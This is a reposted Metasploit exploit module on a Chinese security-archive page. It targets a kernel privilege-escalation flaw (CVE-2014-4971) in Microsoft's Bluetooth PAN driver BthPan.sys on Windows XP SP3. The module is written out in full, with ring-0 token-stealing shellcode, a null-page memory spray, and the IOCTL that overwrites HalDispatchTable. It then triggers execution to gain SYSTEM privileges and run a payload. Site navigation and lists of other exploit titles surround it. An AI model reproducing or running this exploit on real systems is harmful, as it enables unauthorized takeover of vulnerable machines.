首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
来源:metasploit.com 作者:Smith 发布时间:2014-10-16  
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'       =>
        [
          ['Windows XP SP3',
           {
             'HaliQuerySystemInfo' => 0x16bba,
             '_KPROCESS'  => "\x44",
             '_TOKEN'     => "\xc8",
             '_UPID'      => "\x84",
             '_APLINKS'   => "\x88"
           }
          ]
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end


  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)

    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information

    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]
    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
    else
      print_good("Address successfully disclosed.")
    end

    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode
    kernel_shell_address = 0x1

    buf = "\x90" * 0x6000
    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
    buf[0x5000, kernel_shell.length] = kernel_shell

    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    end
    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")

    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DNS Reverse Lookup Shellshock
·Drupal 7.X SQL Injection
·SEO Control Panel 3.6.0 - Auth
·SAP Netweaver Enqueue Server T
·Android browser versions 4.4 c
·Drupal Core <= 7.32 - SQL Inje
·Wordpress InfusionSoft Upload
·Drupal Core <= 7.32 - SQL Inje
·Rejetto HttpFileServer Remote
·Wordpress Theme Dazzling Shell
·F5 iControl Remote Root Comman
·NETIS DL4322D Multiple Vulnera
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved